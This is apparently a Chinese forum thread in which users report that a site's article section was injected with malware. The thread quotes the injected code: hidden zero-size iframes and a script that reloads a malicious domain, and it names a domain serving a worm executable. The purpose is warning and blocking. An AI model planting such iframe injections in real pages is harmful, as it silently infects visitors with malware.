主站MS被挂马

thearefunny

去多点点就知道了

---

本贴由论坛斑竹影北山人结贴，如楼主认为问题未解决，请重新将此贴编辑为“有事请教”，并回帖叙述疑点即可～ ^-^

凌辰

……有什么具体反应么……

thearefunny

点击"文章作品" 然后网页加载完后页面代码变成 然后瑞星提示有马

精灵使者

确认提示有马，而且有一个OK1.EXE被遨游拦截。 经精灵亲自侦测，2008年3月7日晚上23时55分左右主站的文章分类下被挂马，打开文章分区以后进入以下页面：

2. <iframe src=http://v.6t65r.cn/01/ width=0 height=0></iframe><script>function re(){document.write('<iframe src=http://v.6t65r.cn/01/ width=0 height=0></iframe>');}setInterval('re()',9000);</script><iframe src=http://v.6t65r.cn/01/ width=0 height=0></iframe><iframe src=http://v.6t65r.cn/01/ width=0 height=0></iframe><iframe src=http://v.6t65r.cn/01/ width=0 height=0></iframe><iframe src=http://v.6t65r.cn/01/ width=0 height=0></iframe><iframe src=http://v.6t65r.cn/01/ width=0 height=0></iframe>

复制代码

主要下载并执行文件： ｈｔｔｐ：／／ｗ１．ｇｅｔｄｅｗ．ｃｎ／０１／ｏｋ１．ｅｘｅ并且运行。 经NOD报毒为win32/autorunADC 蠕虫的变种病毒。 所以大家访问的时候请将下列网站加入屏蔽列表并且加入不信任区域： ｈｔｔｐ：／／ｖ．６ｔ５６ｒ．ｃｎ／ ｈｔｔｐ：／／ｗ１．ｇｅｔｄｅｗ．ｃｎ／ 由于这些网站为病毒网站，所以请将其改为小写并加入屏蔽列表，切记！ 精灵将密切关注此事。

jzly007

原来是个木马，~害我又从装了次系统~~~~~~~~~~~~~~~~~~

雷欧纳德

似乎的确有点问题。。。。大家先别点文章页面

精灵使者

以下引用雷欧纳德于2009-3-8 17:58:19的发言：

似乎的确有点问题。。。。大家先别点文章页面

我已经找到源头了。
看我的日志……
http://blog.sina.com.cn/s/blog_56a2f0930100cdul.html